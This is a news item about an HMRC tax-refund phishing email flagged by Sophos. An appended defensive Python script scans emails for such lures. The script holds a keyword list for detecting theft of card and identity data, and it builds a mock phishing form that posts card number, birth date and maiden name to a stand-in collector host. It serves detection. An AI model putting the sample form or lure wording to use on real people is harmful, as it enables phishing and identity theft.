The media firestorm surrounding the PAYE under- and overpayment letters that went out to 45,000 taxpayers this week has provided an ideal opportunity for scammers, according to Sophos security experts.
In his blog, Sophos security consultant Graham Cluley published an example spam message now circulating, which arrives with the subject line, “You Have An HMRC Refund”.
The email explains: “Following an upgrade of our computer systems and review of our records we have investigated your payments and latest tax returns over the past years, our calculations show you have made over payments of 317.66GBP.”
A file called Refund-Form.zip is attached to the mail; it contains an HTML form carrying HMRC branding that asks for credit card details, date of birth, and mother's maiden name.
“If you do make the mistake of filling in the form,” Cluley warned, “your confidential data is uploaded to a Chinese server. You're not going to receive a windfall because of this form - you've just been phished.”
HMRC will not contact people about rebates or tax owed by either email or telephone, nor will it ask for bank details. HMRC's security page contains advice about scams like this and states clearly that it will never inform customers of a tax rebate by email, or invite them to complete an online form in order to receive one.
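As an added example (not code from the article, Sophos or HMRC), the following Python script shows how a mail gateway or analyst could flag the lure described above: a refund-themed subject line plus a zip attachment whose HTML form collects card and identity details and posts them elsewhere. The keyword list, the `collector.example.invalid` address and the sample message are constructed assumptions for the demonstration.

```python
import email, io, re, zipfile
from email.message import EmailMessage
from email.policy import default
from html.parser import HTMLParser
# Hypothetical keyword list for fields a refund lure asks for (not from the article).
SENSITIVE = ("card", "cvv", "dob", "birth", "maiden", "password", "sort", "account")

class FormScan(HTMLParser):
    def __init__(self):
        super().__init__()
        self.actions, self.fields = [], []   # <form action> targets and input names
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag in ("input", "select", "textarea"):
            self.fields.append((a.get("name") or a.get("id") or "").lower())

def scan_message(raw):
    """Return findings for one raw RFC 822 message (bytes): a refund-lure subject
    and any zipped HTML attachment whose form collects sensitive fields."""
    msg = email.message_from_bytes(raw, policy=default)
    findings, subj = [], msg.get("Subject", "")
    if re.search(r"\b(hmrc|refund|rebate)\b", subj, re.I):
        findings.append(f"subject uses refund lure: {subj!r}")
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if not name.lower().endswith(".zip"):
            continue
        with zipfile.ZipFile(io.BytesIO(part.get_payload(decode=True))) as zf:
            for info in zf.infolist():
                if not info.filename.lower().endswith((".htm", ".html")):
                    continue
                p = FormScan()
                p.feed(zf.read(info).decode("utf-8", "replace"))
                hits = sorted({f for f in p.fields if any(k in f for k in SENSITIVE)})
                if hits:  # a form in a zipped HTML page that asks for sensitive data
                    findings.append(f"{name}/{info.filename}: fields {hits} post to {p.actions}")
    return findings

def build_sample():
    """Constructed message mimicking the lure described above (not the real spam)."""
    html = ('<form action="http://collector.example.invalid/r" method="post">'
            '<input name="cardnumber"><input name="dob"><input name="maiden_name"></form>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Refund-Form.html", html)
    m = EmailMessage()
    m["Subject"], m["From"], m["To"] = "You Have An HMRC Refund", "a@example.invalid", "b@example.invalid"
    m.set_content("Our calculations show you have made over payments of 317.66GBP.")
    m.add_attachment(buf.getvalue(), maintype="application", subtype="zip", filename="Refund-Form.zip")
    return m.as_bytes()
```

Running `scan_message(build_sample())` reports both the subject lure and the zipped form's fields together with the external address they would be posted to.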